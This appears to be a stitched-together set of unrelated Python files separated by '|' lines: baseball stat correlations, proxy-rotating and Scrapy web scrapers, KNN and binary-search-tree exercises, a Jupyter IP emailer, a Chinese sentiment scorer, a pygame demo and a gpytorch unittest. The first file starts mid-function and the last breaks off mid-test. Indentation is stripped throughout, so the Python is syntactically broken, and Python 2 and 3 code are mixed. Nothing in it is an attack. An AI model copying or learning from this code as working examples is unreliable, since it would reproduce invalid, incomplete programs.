correlation_xy = correlation_matrix[0,1]
r_squared = correlation_xy**2
corr_dict.update({i: r_squared})
sorted_dict = sorted(corr_dict.items(), key=lambda x: x[1], reverse=True)
print(sorted_dict)
def advancedData():
data_set = pd.read_csv("data/mlb_historical_advanced.csv")
runs_game = list(data_set.loc[:, 'R/G'])
corr_dict = {}
for i in range(1, len(data_set.loc[0, :])):
x_values = list(data_set.iloc[:, i])
correlation_matrix = np.corrcoef(x_values, runs_game)
correlation_xy = correlation_matrix[0,1]
r_squared = correlation_xy**2
corr_dict.update({i: r_squared})
sorted_dict = sorted(corr_dict.items(), key=lambda x: x[1], reverse=True)
print(sorted_dict)
advancedData()
|
import datetime
import os
import sys
import time
import logging
import requests
from config import PROXY_URL
class SpiderBase():
selenium = False
name = 'base'
def __init__(self, logger=None, account=None):
# self.name = 'base'
self.l = logger if logger else logging
self.driver = None
self.account = account
self.pid = os.getpid()
self.s = requests.session()
self.proxy = {}
self.proxy_fa = 0
self.change_proxy_times = 0
self.retry_get_proxy_times = 20
self.retry_send_request_times = 20
self.proxy_api = PROXY_URL
self.proxy_request_delay = 5
def get_proxy(self):
l = self.l
if self.proxy and self.proxy_fa < 3:
return self.proxy
for _ in range(self.retry_get_proxy_times):
try:
l.info(f"start get proxy...")
ret_ip = requests.get(self.proxy_api, timeout=10)
IP = ret_ip.text.strip()
proxies = {"http": "http://%s" % IP, "https": "https://%s" % IP}
self.proxy = proxies
self.proxy_fa = 0
self.change_proxy_times += 1
return proxies
except Exception as e:
l.warning(f"query: {self.proxy_api}, get proxy error, sleep 5s and try again.... {str(e)}")
time.sleep(5)
# 代理api挂掉
raise Exception(f"failed to ge proxy after {self.retry_get_proxy_times} times....")
def send_request(self, method, **kwargs):
l = self.l
func_dict = {
'get': self.s.get,
'post': self.s.post
}
lineno = sys._getframe().f_back.f_lineno
called_func = sys._getframe().f_back.f_code.co_name
method = method.lower()
func = func_dict.get(method, None)
if not func:
raise Exception('method:{} error'.format(method))
try:
kwargs.pop('verify')
except:
pass
if not kwargs.get('timeout', None):
kwargs['timeout'] = 30
for _ in range(self.retry_send_request_times):
proxies = self.get_proxy()
kwargs['proxies'] = proxies
l.info(
f'{self.name} pid:{self.pid} -> retry: {_+1}, change: {self.change_proxy_times}, failed: {self.proxy_fa}, '
f'current: {proxies["http"]}, called: {called_func}:{lineno}')
try:
res = func(**kwargs)
self.proxy_fa = 0
return res
except Exception as e:
self.proxy_fa += 1
l.warning(f"request error: {e.__context__}")
if self.proxy_request_delay:
l.info(f"send request sleep {self.proxy_request_delay}s.")
time.sleep(self.proxy_request_delay)
raise Exception(f"failed to get page response after {self.retry_send_request_times} times....")
def query_list_page(self, key, page):
pass
def query_detail_page(self, url):
pass
|
# coding: UTF-8
from numpy import *
import operator
import math
import random
from os import listdir
import Knn
#from Knn import ArgSort_k
# 跟KNN差不多。只是这里的距离是已经提前算好的。还是本质还是通过KNN来模式识别。
def topk(distances,labels,k):
sortedDistIndicies = Knn.ArgSort_k(distances,len(distances),k);
#print 'sortedDistIndicies',sortedDistIndicies
classCount={}
for i in range(k):
voteIlabel = labels[sortedDistIndicies[i]]
classCount[voteIlabel] = classCount.get(voteIlabel,0) + 1
#print 'classCount',classCount
sortedClassCount = sorted(classCount.items(), key=operator.itemgetter(1), reverse=True)
#print 'sortedClassCount',sortedClassCount
return sortedClassCount[0][0]
# 加载数据。
def loadDataSet(fileName):
numFeat = len(open(fileName).readline().split('\t')) - 1 # 通过\t作为间隔来统计向量的维数
dataMat = []; labelMat = []
fr = open(fileName)
for line in fr.readlines():
lineArr =[]
curLine = line.strip().split('\t')
for i in range(numFeat):
lineArr.append(float(curLine[i]))
dataMat.append(lineArr)
labelMat.append(float(curLine[-1]))
return dataMat,labelMat
# 谁能告诉我这个玩意在这里干什么?!差了个float?!卖萌的么……
def loadDataSet1(fileName): #general function to parse tab -delimited floats
numFeat = len(open(fileName).readline().split('\t')) - 1 #get number of fields
dataMat = []; labelMat = []
fr = open(fileName)
for line in fr.readlines():
lineArr =[]
curLine = line.strip().split('\t')
for i in range(numFeat):
lineArr.append((curLine[i]))
dataMat.append(lineArr)
labelMat.append((curLine[-1]))
return dataMat,labelMat
# 将各种数据标准化。转化成0-1的范围。防止某些数据权重过大。方法就是找出最大最小。然后直接算比例。
def autoNorm(dataSet):
minVals = dataSet.min(0)
maxVals = dataSet.max(0)
ranges = maxVals - minVals
normDataSet = zeros(shape(dataSet))
m = dataSet.shape[0]
normDataSet = dataSet - tile(minVals, (m,1))
normDataSet = normDataSet/tile(ranges, (m,1)) #element wise divide
return normDataSet, ranges, minVals
# 小测试函数。没有测试数据所以没有运行结果。
def try1() :
dataMat1,labelMat=loadDataSet('testSet1.txt')
dataMat=array(dataMat1)
m,n=shape(dataMat)
print('dataMat[1,:]',dataMat[1,:])
list=array([2,2,4,1,5,3,2,7])
sortd=sorted(list,reverse=True)
sortedlist = list.argsort()
print('sortd',sortd)
minVals=dataMat.min(0)
print('minVals',minVals)
DminVals=tile(minVals,(m,1))
#print('DminVals',DminVals)
dataMat,labelMat=loadDataSet1('lenses.txt')
m,n=shape(dataMat)
print(dataMat[1][2])
if '__name__ == __main__' :
# try1()
#distances=array([23,45,12,78,45,90,32,45,20])
#labels=array([2,3,2,1,2,3,1,1,2])
size=100;
distances=array([random.random()*size for i in range(size)]);
#print distances
labels=array([int(random.random()*10) for i in range(size)])
#print labels
print topk(distances,labels,10)
|
yes_questions = set()
total_questions = 0
for line in open('in').readlines():
if line == '\n':
total_questions += len(yes_questions)
yes_questions = set()
continue
yes_questions |= set(line.strip())
total_questions += len(yes_questions)
print(total_questions) |
import socket
import os
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip_address= s.getsockname()[0]
print(ip_address)
s.close()
def_email = os.getenv("EMAIL")
def_pass = os.getenv("EMAIL_PASSWORD")
msg = '{0}:8888 Jupyter server running'.format(ip_address)
def send_email(sender=def_email, email=def_email, password=def_pass,
receiver=def_email, msg=msg):
#Ports 465 and 587 are intended for email client to email server communication - sending email
server = smtplib.SMTP('smtp.gmail.com', 587)
#starttls() is a way to take an existing insecure connection and upgrade it to a secure connection using SSL/TLS.
server.starttls()
#Next, log in to the server
server.login(email, password)
master_message = MIMEMultipart() # create a message
# add in the actual person name to the message template
message = msg
master_message['From']=email
master_message['To']=email
master_message['Subject']="Jupyter_Notebook"
master_message.attach(MIMEText(message, 'plain'))
#Send the mail
server.send_message(master_message)
if __name__ == '__main__':
send_email()
|
# -*- coding: utf-8 -*-
from urllib import parse
import scrapy
from scrapy.http import Request
from articleSpider.items import ArticleItem
class JobboleSpider(scrapy.Spider):
name = 'jobbole'
allowed_domains = ['blog.jobbole.com']
start_urls = ['http://blog.jobbole.com/all-posts/']
def parse(self, response):
post_nodes = response.css('#archive > div.floated-thumb > div.post-thumb > a')
for post_node in post_nodes:
image_url = post_node.css('img::attr(src)').extract_first('')
post_url = post_node.css('::attr(href)').extract_first('')
yield Request(url=parse.urljoin(response.url, post_url),
meta={'front_image': parse.urljoin(response.url, image_url)},
callback=self.parse_detail)
next_url = response.css('#archive > div.navigation.margin-20 > a.next.page-numbers::attr(href)').extract_first(
'')
if next_url:
yield Request(url=next_url, callback=self.parse)
@staticmethod
def parse_detail(response):
article_item = ArticleItem()
title = response.css('div.entry-header > h1::text').extract_first('')
create_date = response.css('div.entry-meta > p::text').extract_first('').strip().replace(
' ·', '')
front_image = response.meta.get('front_image', '')
article_item['title'] = title
article_item['create_date'] = create_date
article_item['front_image'] = [front_image]
yield article_item
|
# Generated by Django 2.0.dev20170827005745 on 2017-10-03 03:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('journals', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='entry',
name='orginal_index',
),
migrations.AddField(
model_name='entry',
name='orginal_entry',
field=models.PositiveIntegerField(default=0),
),
]
|
from __future__ import print_function
import argparse
COUNTER = 0
class Stack:
def __init__(self):
self.stack = []
def pop(self):
if self.isEmpty():
return None
else:
return self.stack.pop()
def push(self,val):
return self.stack.append(val)
def size(self):
return len(self.stack)
def isEmpty(self):
return self.size() == 0
def __str__(self):
if self.isEmpty():
return 'empty stack'
return str(self.stack).strip('[]')
class BSTNode:
def __init__(self, data=''):
self.data = data
self.left = None
self.right = None
self.rightSize = 0
class BST:
def __init__(self):
self.root = None
self.size = 0
def __len__(self):
return self.size
def __str__(self):
if self.root == None:
return 'empty BST'
str_list = [str(i) for i in inorder(self.root)]
return '(inorder) ' + ' '.join(str_list)
def __repr__(self):
return 'BST: ' + self.__str__()
def toStringRightSize(self):
if self.root == None:
return 'empty BST'
str_list = ['(%d,%d)'%(i, s) for i, s in inorder_rightSize(self.root)]
return '(inorder) ' + ' '.join(str_list)
def insert(self, target):
prev = None
curr = self.root
while curr != None:
c = target - curr.data
if c == 0:
raise ValueError('Duplicate key')
prev = curr
curr = curr.left if c < 0 else curr.right
if c > 0:
prev.rightSize += 1
newNode = BSTNode(target)
self.size += 1
if self.root == None:
self.root = newNode
return
if c < 0:
prev.left = newNode
else:
prev.right = newNode
def insert_recursive(self, target, root=None):
# P3
if root == None:
self.size += 1
return BSTNode(target)
c = target - root.data
if c == 0:
raise ValueError('Duplicate key')
if c < 0:
root.left = self.insert_recursive(target, root.left)
else:
root.right = self.insert_recursive(target, root.right)
root.rightSize += 1
return root
def delete(self, target):
# P2
global COUNTER
# locate target
prev = None
curr = self.root
COUNTER += 2
while curr != None:
COUNTER += 1 # equal comparison
if curr.data == target:
break
c = target - curr.data
COUNTER += 1
prev = curr
curr = curr.left if c < 0 else curr.right
COUNTER += 2
if curr == None:
raise ValueError('Target not found')
self.size -= 1
# check number of child
if curr.left == None:
if c < 0:
prev.left = curr.right
COUNTER += 1
else:
prev.right = curr.right
COUNTER += 1
return
if curr.right == None:
if c < 0:
prev.left = curr.left
COUNTER += 1
else:
prev.right = curr.left
COUNTER += 1
return
# locate smallest value in right subtree, successor
temp = curr
COUNTER += 1
prev = curr
curr = curr.right
COUNTER += 2
while curr.left != None:
prev = curr
curr = curr.left
COUNTER += 2
# overwite target with successor
temp.data = curr.data
# delete successor
if curr.right == None:
prev.left = None
COUNTER += 1
else:
prev.left = curr.right
COUNTER += 1
def kthLargest(self, k=1):
# P6
prev = None
curr = self.root
numLarger = curr.rightSize
while True:
if numLarger == k-1:
break
prev = curr
if numLarger > k-1:
# search in right subtree
curr = curr.right
numLarger -= prev.rightSize - curr.rightSize
else:
# search in left subtree
curr = curr.left
numLarger += 1 + curr.rightSize
return curr.data
# helper function, inorder traversal
def inorder(root):
if root == None:
return
# left subtree
for i in inorder(root.left):
yield i
# root node
yield root.data
# right subtree
for i in inorder(root.right):
yield i
def inorder_rightSize(root):
if root == None:
return
# left subtree
for i, s in inorder_rightSize(root.left):
yield i, s
# root node
yield root.data, root.rightSize
# right subtree
for i, s in inorder_rightSize(root.right):
yield i, s
# non-recursive inorder traversal
def inorder_stack(root):
S = Stack()
curr = root
while curr != None or not S.isEmpty():
# find left most
while curr != None:
S.push(curr)
curr = curr.left
# pop
curr = S.pop()
yield curr.data
# right tree
curr = curr.right
# P4
def keysInRange(root, minVal, maxVal):
global COUNTER
if root == None:
return
c1 = minVal - root.data
c2 = root.data - maxVal
COUNTER += 2
if c1 <= 0 and c2 <= 0:
# min <= root <= max
yield root.data
if c1 < 0:
# min < root
for i in keysInRange(root.left, minVal, maxVal):
yield i
if c2 < 0:
# root < max
for i in keysInRange(root.right, minVal, maxVal):
yield i
# P5
def reverseKeys(root):
if root == None:
return
reverseKeys(root.left)
reverseKeys(root.right)
root.left, root.right = root.right, root.left
# P6
def kthLargest(root, k=1):
if root.rightSize == k-1:
return root.data
if root.rightSize > k-1:
return kthLargest(root.right, k)
else:
return kthLargest(root.left, k-1-root.rightSize)
def test0():
t = BST()
for i in [10, 17, 3, 90, 22, 7, 40, 15]:
t.insert(i)
print(t)
t = BST()
for i in [25, 10, 40, 2, 20, 30, 45, 15, 35]:
t.insert(i)
print(t)
def test2():
global COUNTER
t = BST()
for i in [10, 17, 3, 90, 22, 7, 40, 15]:
t.insert(i)
print(t)
COUNTER = 0
t.delete(17)
print(t)
print('# of unit of work: %d' % COUNTER)
def test3():
t1 = BST()
for i in [10, 17, 3, 90, 22, 7, 40, 15]:
t1.insert(i)
print('length: %d' % len(t1))
print(t1)
t2 = BST()
for i in [10, 17, 3, 90, 22, 7, 40, 15]:
t2.root = t2.insert_recursive(i, t2.root)
print('length: %d' % len(t2))
print(t2)
def test4():
global COUNTER
t = BST()
for i in [10, 17, 3, 90, 22, 7, 40, 15]:
t.insert(i)
print(t)
print('keys in range [4, 20]: ')
COUNTER = 0
for i in keysInRange(t.root, 4, 20):
print(i)
print('# of unit of work: %d' % COUNTER)
def test5():
t = BST()
for i in [10, 17, 3, 90, 22, 7, 40, 15]:
t.insert(i)
print(t)
print('reverse keys: ')
reverseKeys(t.root)
print(t)
def test6():
t = BST()
for i in [10, 17, 3, 90, 22, 7, 40, 15]:
t.insert(i)
print(t)
for k in range(1, len(t)+1):
i = kthLargest(t.root, k)
print('%d-th largest: %d'%(k, i))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('test_number', type=int, default=0)
opt = parser.parse_args()
eval('test%d()' % opt.test_number)
|
def fib(n):
if n == 1 or n == 2:
return 1
return fib(n-1) + fib(n-2)
print fib(1)
print fib(8)
|
import csv
import os
import re
import shutil
import sys
import timeit
import urllib.request
class Scrape:
def __init__(self, infile, outfile, errfile, outdir):
self.infile = infile
self.errfile = errfile
self.outfile = outfile
self.outdir = outdir
# Get rid of old output and error files
def clean(self):
run = input("Are you sure you want to delete " + self.outfile + " and " + self.errfile + "? (y/n) ")
if run.lower() == "y":
print("Started clean...")
if os.path.isfile(self.outfile):
os.remove(self.outfile)
if os.path.isfile(self.errfile):
os.remove(self.errfile)
print("Finished clean...")
else:
print("Skipping clean...")
# Scrape!
def scrape(self):
print("Started scraping...")
start = timeit.default_timer()
with open(self.outfile, "a") as outf, open(self.errfile, "a") as errf:
out_writer = csv.writer(outf)
err_writer = csv.writer(errf)
for line in self.get_line():
result = self.process_line(line)
if 'err' in result:
err_writer.writerow(line + [result['err']])
else:
out_writer.writerow(line + [result['fpath']])
stop = timeit.default_timer()
print("Finished scraping...")
print("Time: ", stop - start)
def process_line(self, row):
orig_url = row[1] + "~original"
name_slashes = re.match(r"(?:.*?\/){5}(.*)", row[1]).group(1)
name = re.sub(r"\/", "_", name_slashes)
subdir = os.path.join(self.outdir, name[:1])
path = os.path.join(subdir, name)
if not os.path.exists(subdir):
os.makedirs(subdir)
if not os.path.isfile(path): # Don't download the image again if it's already been fetched
try:
img_orig = self.process_image(row, orig_url, path)
return img_orig
except:
try:
img = self.process_image(row, row[1], path)
return img
except Exception as err:
return { 'row': row, 'url': row[1], 'err': err }
return { 'row': row, 'url': row[1], 'err': "File has already been downloaded" }
def process_image(self, row, url, fpath):
with urllib.request.urlopen(url) as img, open(fpath, 'wb') as f:
shutil.copyfileobj(img, f)
return { 'row': row, 'fpath': fpath }
# Get next line in CSV
def get_line(self):
with open(self.infile, "r") as f:
reader = csv.reader(f)
for row in reader:
yield row
if __name__ == "__main__":
test = Scrape("../inputs/test-in.csv", "../outputs/output.csv", "../outputs/errors.csv", "../images/")
test.clean()
test.scrape()
|
import pandas as pd
import requests
from bs4 import BeautifulSoup
page = requests.get('https://forecast.weather.gov/MapClick.php?lat=34.10275767047926&lon=-118.33700636828377#.X0NkPhHhVNg')
soup = BeautifulSoup(page.content, 'html.parser')
week = soup.find(id='seven-day-forecast-body')
items = week.find_all(class_='tombstone-container')
print(items[0].find(class_='period-name').get_text())
print(items[0].find(class_='short-desc').get_text())
print(items[0].find(class_='temp').get_text())
period_names = [item.find(class_='period-name').get_text() for item in items]
short_descriptions = [item.find(class_='short-desc').get_text() for item in items]
temperatures = [item.find(class_='temp').get_text() for item in items]
print(period_names)
print(short_descriptions)
print(temperatures)
weather_stuff = pd.DataFrame(
{
'period': period_names,
'short_descriptions': short_descriptions,
'temperatures': temperatures
})
print(weather_stuff)
weather_stuff.to_csv('weather.csv')
|
import json
input = input()
data = json.loads(input)
classs = dict()
offspr = dict()
check = dict()
def checking(name, elem):
for x in classs[name]:
if elem not in check[x]:
check[x].append(elem)
offspr[x] += 1
checking(x, elem)
for y in data:
classs[y['name']] = y['parents']
offspr[y['name']] = 1
check[y['name']] = [y['name']]
for name in classs:
checking(name, name)
keys = []
for v in classs.keys():
keys.append(v)
keys.sort()
for v in keys:
print(str(v) + ' : ' + str(offspr[v])) |
# -*- coding: utf-8 -*-
#
# Certbot documentation build configuration file, created by
# sphinx-quickstart on Sun Nov 23 20:35:21 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import codecs
import os
import re
import sys
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
]
master_doc = 'index'
# General information about the project.
project = u'OpenTransfr'
copyright = u'2016, OpenTransfr Project'
|
class URLS:
restaurants = 'https://disneyworld.disney.go.com/dining/'
token = 'https://disneyworld.disney.go.com/authentication/get-client-token/'
availability = 'https://disneyworld.disney.go.com/finder/dining-availability/'
DEFAULT_HEADER = {'X-Requested-With': 'XMLHttpRequest'}
try:
import lxml
BS_LEXER = 'lxml'
except ImportError:
BS_LEXER = 'html.parser'
KEYRING_SERVICE = 'disney.api' |
import time
import sys
def TripletFinder(SourceFile):
Number = []
Length = 100000
PreviousI = 101
PreviousJ = 101
PreviousK = 101
with open(SourceFile) as File:
for Index in range(Length):
Line = File.readline()
Number.append(int(Line))
Number.sort()
for i in range(Length-2):
if Number[i] != PreviousI:
j = i + 1
k = Length - 1
while j <= k:
if (PreviousJ == Number[j]) & (PreviousK == Number[k]):
k -= 1
else:
if Number[i] + Number[j] + Number[k] > 0:
k -= 1
elif Number[i] + Number[j] + Number[k] < 0:
j += 1
else:
TripletFile.write("{} {} {}\n".format(str(Number[i]),
str(Number[j]), str(Number[k])))
j += 1
PreviousJ = Number[j]
PreviousK = Number[k]
PreviousI = Number[i]
File.close()
start_time = time.clock()
with open("Triplets.txt", "w") as TripletFile:
for files in range(100):
Source = "file"
Source += str(files+1)
Source += ".txt"
TripletFinder(Source)
sys.stdout.write("\r" + str(files+1) + "%")
sys.stdout.flush()
TripletFile.close()
print()
print("execution time: {:.2f} seconds".format(time.clock() - start_time)) |
import math
import jieba
from openpyxl import load_workbook
import re
def count_min(i,j,sen_word,degree_word,not_words,degree_dict,word_list_2,a,sigma):
sum_not=0
sum_degree=0
x = -math.pow(j-a,2)/(2*math.pow(sigma,2))
for m in range(i+1,j):
if word_list_2[m] in not_words:
sum_not+=1
elif word_list_2[m] in degree_dict:
sum_degree=sum_degree+degree_word[m]
if(sum_degree==0):
return math.pow(-1,sum_not)*sen_word[j]*math.exp(x)
else:
return math.pow(-1,sum_not)*sum_degree*sen_word[j]*math.exp(x)
def count_min_1_1(a,j,sen_word,degree_word,not_words,degree_dict,word_list_2,sigma):
sum_not=0
sum_degree=0
x = -math.pow(j-a,2)/(2*math.pow(sigma,2))
for m in range(a+1,j):
if word_list_2[m] in not_words:
sum_not+=1
elif word_list_2[m] in degree_dict:
sum_degree=sum_degree+degree_word[m]
if(sum_degree==0):
return math.pow(-1,sum_not)*sen_word[j]*math.exp(x)
else:
return math.pow(-1,sum_not)*sum_degree*sen_word[j]*math.exp(x)
def count_min_1_2(j,a,sen_word,degree_word,not_words,degree_dict,word_list_2,sigma):
sum_not=0
sum_degree=0
x = -math.pow(j-a,2)/(2*math.pow(sigma,2))
for m in range(j+1,a):
if word_list_2[m] in not_words:
sum_not+=1
elif word_list_2[m] in degree_dict:
sum_degree=sum_degree+degree_word[m]
if(sum_degree==0):
return math.pow(-1,sum_not)*sen_word[j]*math.exp(x)
else:
return math.pow(-1,sum_not)*sum_degree*sen_word[j]*math.exp(x)
def judge_line(sentiment_dict,line):
sigma = 21
not_words = [w.strip() for w in open('D:/success/ciku/notDict.txt').readlines()]
degree_words = open('D:/success/ciku/degreeDict.txt').readlines()
degree_dict = {}
for w in degree_words:
word, score = w.strip().split(' ')
degree_dict[word] = float(score)
jieba.add_word('百度')
for word in not_words:
jieba.add_word(word)
line = re.sub('[\s+\.\!\/_$%^*(+\"\')]+|[+——()?【】“”!。,?、~@#¥%……&*()]+', "", line)
word_list = jieba.cut(line)
word_list = [w for w in word_list]
#print(word_list)
word_list_2 = []
for word in word_list:
if word in sentiment_dict:
word_list_2.append(word)
elif word in degree_dict:
word_list_2.append(word)
elif word in not_words:
word_list_2.append(word)
elif word == '百度':
word_list_2.append(word)
sen_word = {}
not_word = {}
degree_word = {}
for index, word in enumerate(word_list_2):
if word in sentiment_dict and word not in not_words and word not in degree_dict:
sen_word[index] = sentiment_dict[word]
elif word in not_words and word not in degree_dict:
not_word[index] = -1
elif word in degree_dict:
degree_word[index] = degree_dict[word]
if (len(sen_word) == 0):
return 0
sum_emotion = 0
sen_loc = list(sen_word.keys())
entities = []
sum_entity = 0
for a in range(0, len(word_list_2)):
if (word_list_2[a] == '百度'):
entities.append(a)
for a in entities:
#print(a)
if (len(sen_loc) == 1):
if a < sen_loc[0]:
sum_emotion = count_min_1_1(a,sen_loc[0],sen_word,degree_word,not_words,degree_dict,word_list_2,sigma)
if a > sen_loc[0]:
sum_emotion = count_min_1_2(sen_loc[0],a,sen_word,degree_word,not_words,degree_dict,word_list_2,sigma)
for i in range(0, len(sen_loc) - 1):
sum_emotion = sum_emotion + count_min(sen_loc[i], sen_loc[i + 1], sen_word, degree_word, not_words, degree_dict,
word_list_2, a, sigma)
avg_emotion = sum_emotion / len(sen_loc)
sum_entity = sum_entity + avg_emotion
#print(entities)
return sum_entity/len(entities)
def in_or_not_in_line(sentiment_words,line):
not_words = [w.strip() for w in open('D:/success/ciku/notDict.txt').readlines()]
jieba.add_word('百度')
for word in not_words:
jieba.add_word(word)
word_list = jieba.cut(line)
word_list = [w for w in word_list]
for word in word_list:
if word in sentiment_words:
return 1
|
import pygame
###########################################################(반드시 필요)
pygame.init() #처음 초기화 하는 기능
#화면 크기 설정
screen_width= 480
screen_height = 640
screen = pygame.display.set_mode((screen_width,screen_height)) #실제로 적용됨
#화면 타이틀 설정
pygame.display.set_caption("Nado Game") #게임 이름 설정
# FPS
clock =pygame.time.Clock()
#########################################################################
# 1. 사용자 게임 초기화 (배경화면, 게임 이미지, 좌표, 속도, 폰트 등)
#배경 이미지 불러오기
background = pygame.image.load("C:/testpy/python_ex/pyton_game_background.png")
#캐릭터 불러오기
character = pygame.image.load("C:/testpy/python_ex/pyton_game_character.png")
character_size = character.get_rect().size #이미지의 크기를 구해옴
character_width = character_size[0] #캐릭터의 가로 크기
character_height = character_size[1] #캐릭터의 세로 크기
character_x_pos = (screen_width - character_width) /2 #화면 괄호의 절반에 해당하는 곳에 위치하기 위한 값 (가로)
character_y_pos = screen_height - character_height #화면 바닥에 위치하기 위한 값 (세로)
#이동할 좌표
to_x=0
to_y=0
#이동 속도
character_speed = 1
#적 enemy 캐릭터
enemy = pygame.image.load("C:/testpy/python_ex/pyton_game_enemy.png")
enemy_size = enemy.get_rect().size #이미지의 크기를 구해옴
enemy_width = enemy_size[0] #적군의 가로 크기
enemy_height = enemy_size[1] #적군의 세로 크기
enemy_x_pos = (screen_width - enemy_width) /2 #화면 괄호의 절반에 해당하는 곳에 위치하기 위한 값 (가로)
enemy_y_pos = (screen_height - enemy_height) /2 #화면 괄호의 절반에 해당하는 곳에 위치하기 위한 값 (세로)
#이동할 좌표
to_x=0
to_y=0
#이동 속도
character_speed = 1
#폰트 정의
game_font = pygame.font.Font(None, 40) #폰트 객체 생성 (폰트, 크기)
#총 시간
total_time = 10
# 시간 계산
start_ticks = pygame.time.get_ticks() #현재 tick을 받아옴
#########################################################################
#이벤트 루프 설정 : 게임이 꺼지지 않게 하는 코드
running = True #게임이 진행중인가?
while running:
dt = clock.tick(60) #게임 화면의 초당 프레임 수
#프레임때문에 이동속도 제한이 걸리지 않도록 프레임 수를 조정해야한다.
# 2. 이벤트 처리 (키보드, 마우스 등)
for event in pygame.event.get(): #어떤 이벤트가 발생하였는가?
if event.type == pygame.QUIT: #창이 닫히는 이벤트가 발생할 때
running=False #게임이 진행중이 아니다.
if event.type == pygame.KEYDOWN: #키가 눌러졌는지 확인
if event.key == pygame.K_LEFT: #캐릭터를 왼쪽으로
to_x-=character_speed
elif event.key == pygame.K_RIGHT: #캐릭터를 오른쪽으로
to_x+=character_speed
elif event.key == pygame.K_UP: #캐릭터를 위쪽으로
to_y-=character_speed
elif event.key == pygame.K_DOWN: #캐릭터를 아래쪽으로
to_y+=character_speed
if event.type == pygame.KEYUP: #키를 땠는지 확인
if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT: #캐릭터 좌우로 가던걸 멈춤
to_x = 0
if event.key == pygame.K_UP or event.key == pygame.K_DOWN: #캐릭터 상하로 가던걸 멈춤
to_y = 0
###################################################################################################
# 3. 게임 캐릭터 위치 정의
#캐릭터의 이동 설정
character_x_pos+=to_x * dt #dt를 곱해주는 이유는 FPS와 상관없이 속도를 조절하기 위함
character_y_pos+=to_y * dt
#가로 경계값 설정
if character_x_pos<0:
character_x_pos=0
elif character_x_pos> screen_width - character_width:
character_x_pos= screen_width - character_width
#세로 경계값 설정
if character_y_pos<0:
character_y_pos=0
elif character_y_pos>screen_height - character_height:
character_y_pos=screen_height - character_height
######################################################################
#4. 충돌 처리
#충돌 처리를 위한 rect 정보 업데이트
character_rect = character.get_rect()
character_rect.left = character_x_pos
character_rect.top = character_y_pos
enemy_rect = enemy.get_rect()
enemy_rect.left = enemy_x_pos
enemy_rect.top = enemy_y_pos
#충돌 체크
if character_rect.colliderect(enemy_rect):
print("충돌했어요!")
running = False
###############################################################
# 5. 화면에 그리기
# screen.fill((127,127,127)) #게임의 색 채우기
screen.blit(background, (0,0)) #배경 그리기
screen.blit(character, (character_x_pos,character_y_pos)) #캐릭터 그리기
screen.blit(enemy, (enemy_x_pos, enemy_y_pos)) #적 캐릭터 그리기
#타이머 시간 넣기
#경계 시간 계산
elapsed_time = (pygame.time.get_ticks() - start_ticks) /1000
#경과 시간을 1000으로 나누어 초단위로 표시
timer = game_font.render(str(int(total_time -elapsed_time)),True,(255,255,255))
#출력할 글자, True, 글자 색상
screen.blit(timer,(10,10))
#만약 시간이 0미만이면 게임 종료
if total_time< elapsed_time:
print("Time Out!")
running = False
######################################################################################
# 6. 업데이트 (필수)
pygame.display.update() # 게임화면 다시 그리기
###########################################################
# 7. 종료전 대기 (없어도 되는 부분)
#잠시 대기 (종료되는 모든 순간에 적용)
pygame.time.delay(2000) #2초 정도 대기 (단위 : ms)
###########################################################
# 8. pygame 종료 (필수)
#게임 종료하고 pygame도 종료 할 때
pygame.quit()
########################################### |
class Person:
def __init__(self, fname, lname):
self.fname = fname
self.lname = lname
def printname(self):
print(self.fname, self.lname)
x = Person("PersonFN", "PersonLN")
x.printname()
class Student(Person):
def __init__(self, fname, lname):
# Person.__init__(self, fname, lname)
super().__init__(fname, lname)
x = Student("StudentFN", "StudentLN")
x.printname() |
import unittest
import numpy as np
from meta_learn.GPR_mll import GPRegressionLearned
from meta_learn.GPR_meta_mll import GPRegressionMetaLearned
from gpytorch.kernels import CosineKernel
import torch
class TestGPR_mll(unittest.TestCase):
def setUp(self):
## --- generate toy data --- #
torch.manual_seed(22)
np.random.seed(25)
# train
n_train_points = 60
self.x_train = np.linspace(-2, 2, num=n_train_points)
self.y_train_zero = self.x_train * 0 + np.random.normal(scale=0.02, size=self.x_train.shape)
self.y_train_two = self.x_train * 0 + 2 + np.random.normal(scale=0.02, size=self.x_train.shape)
self.y_train_sin = np.sin(4* self.x_train)
# test
n_test_points = 80
self.x_test = np.linspace(-2.1, 2.1, num=n_test_points)
self.y_test_zero = self.x_test * 0 + np.random.normal(scale=0.02, size=self.x_test.shape)
self.y_test_two = self.x_test * 0 + 2 + np.random.normal(scale=0.02, size=self.x_test.shape)
self.y_test_sin = np.sin(4 * self.x_test)
def test_random_seed_consistency(self):
gpr_model_1 = GPRegressionLearned(self.x_train, self.y_train_two, learning_mode='both',
num_iter_fit=5, mean_module='NN', covar_module='NN', random_seed=22)
gpr_model_2 = GPRegressionLearned(self.x_train, self.y_train_two, learning_mode='both',
num_iter_fit=5, mean_module='NN', covar_module='NN', random_seed=22)
gpr_model_1.fit()
t_predict_1 = gpr_model_1.predict(self.x_test)
gpr_model_2.fit()
t_predict_2 = gpr_model_2.predict(self.x_test)
self.assertTrue(np.array_equal(t_predict_1, t_predict_2))
def test_serializable(self):
torch.manual_seed(40)
np.random.seed(22)
import itertools
# check that more datasets improve performance
for mean_module, covar_module in itertools.product(['constant', 'NN'], ['SE', 'NN']):
gpr_model = GPRegressionLearned(self.x_train, self.y_train_two, learning_mode='both',
num_iter_fit=10, mean_module=mean_module, covar_module='NN', random_seed=22)
gpr_model.fit()
pred_1 = gpr_model.predict(self.x_train)
gpr_model2 = GPRegressionLearned(self.x_train, self.y_train_two, learning_mode='both',
num_iter_fit=1, mean_module=mean_module, covar_module='NN', random_seed=345)
gpr_model2.fit()
